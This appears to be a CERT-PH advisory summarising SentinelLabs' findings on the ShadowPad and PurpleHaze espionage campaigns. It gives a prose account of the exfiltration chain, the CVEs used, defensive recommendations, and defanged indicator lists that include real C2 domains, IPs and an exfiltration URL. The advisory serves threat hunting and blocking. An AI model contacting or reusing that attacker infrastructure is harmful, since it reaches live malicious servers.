SentinelLabs of SentinelOne has observed and defended a malicious campaign targeting public sector organizations and global industries, including their own organization

Based on the official blog released, there are 6 activities that have been observed and tracked to the activity of cluster PurpleHaze and ShadowPad.

ShadowPad Cluster

SentinelLabs has uncovered a sophisticated campaign targeting a South Asian government and an IT services and logistics company with ties to SentinelOne. The attack was attributed to APT41, which leveraged an obfuscated ShadowPad variant known as ScatterBrain. Several samples from this campaign were also reported by security vendors including Trend Micro, Orange Cyberdefense, and Check Point.

In one observed activity, a sample named “AppSov.exe” was used to download a malicious file called “x.dat” via a PowerShell command. Once executed, the file collects sensitive user data, copies the files to a temporary folder, compresses them using 7-Zip with password protection, and exfiltrates the archive via a cURL POST request.

PurpleHaze Cluster

The PurpleHaze activity cluster leveraged the GOREshell backdoor and an Operational Relay Box (ORB) network to conduct cyberespionage, targeting a South Asian government entity and on SentinelOne. Meanwhile, the attack on a European media organization was attributed to UNC5174, which exploited CVE-2024-8963 and CVE-2024-8190 to establish an initial foothold.

FILES
Webshell106248206f1c995a76058999ccd6a6d0f420461e
GOREshell (snapd)411180c89953ab5e0c59bd4b835eef740b550823
Nimbo-C2 agent (PfSvc.exe)4896cfff334f846079174d3ea2d541eec72690a0
ShadowPad5ee4be6f82a16ebb1cf8f35481c88c2559e5e41a
GOREshell (update-notifier)7dabf87617d646a9ec3e135b5f0e5edae50cd3b9
GOREshella31642046471ec138bb66271e365a01569ff8d7f
ShadowPada88f34c0b3a6df683bb89058f8e7a7d534698069
ShadowPadaa6a9c25aff0e773d4189480171afcf7d0f69ad9
ShadowPadc43b0006b3f7cd88d31aded8579830168a44ba79
GOREshell (glib-2.0.dll)cb2d18fb91f0cd88e82cb36b614cfedf3e4ae49b
Legitimate VMWare executable (VGAuthService.exe)cbe82e23f8920512b1cf56f3b5b0bca61ec137b9
GOREshellebe6068e2161fe359a63007f9febea00399d7ef3
ShadowPad (AppSov.exe)f52e18b7c8417c7573125c0047adb32d8d813529
DOMAINS
cloud.trendav[.]coSuspected PurpleHaze infrastructure
downloads.trendav[.]vipGOREshell C2 server
dscriy.chtq[.]netShadowPad C2 server
epp.navy[.]ddns[.]infoGOREshell C2 server
mail.ccna[.]organiccrap[.]comGOREshell C2 server
mail.secmailbox[.]usSuspected PurpleHaze infrastructure
network.oossafe[.]comSuspected ShadowPad C2 server
news.imaginerjp[.]comShadowPad C2 server
notes.oossafe[.]comSuspected ShadowPad C2 server
secmailbox[.]usSuspected PurpleHaze infrastructure
sentinelxdr[.]usSuspected PurpleHaze infrastructure
tatacom.duckdns[.]orgC2 server
trendav[.]vipSuspected PurpleHaze infrastructure
updata.dsqurey[.]comShadowPad C2 server
IP ADDRESSES
103.248.61[.]136Malware hosting location
107.173.111[.]26GOREshell C2 server
128.199.124[.]136C2 server
142.93.212[.]42Suspected PurpleHaze infrastructure
142.93.214[.]219GOREshell C2 server
143.244.137[.]54Suspected PurpleHaze infrastructure
45.13.199[.]209Exfiltration IP address
65.38.120[.]110ShadowPad C2 server
URLs
https[://]45.13.199[.]209/rss/rss.phpExfiltration URL

CERT-PH recommends the following actions be taken:

  • Regularly apply necessary updates and patches to mitigate future threats, especially public-facing assets.
  • Proactively monitor the logs and network traffic to the identified systems and devices for any suspicious/malicious activities
  • Install an anti-virus software and/or host-based detection tool running with the latest version to protect your data and devices.
  • Indicator of compromise is available in the official report for threat hunting and blocking purposes.
  • Conduct third-party audits to service providers for security compliance to help identify and mitigate potential security risks.
  • For additional information, kindly refer to the official report
    • https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/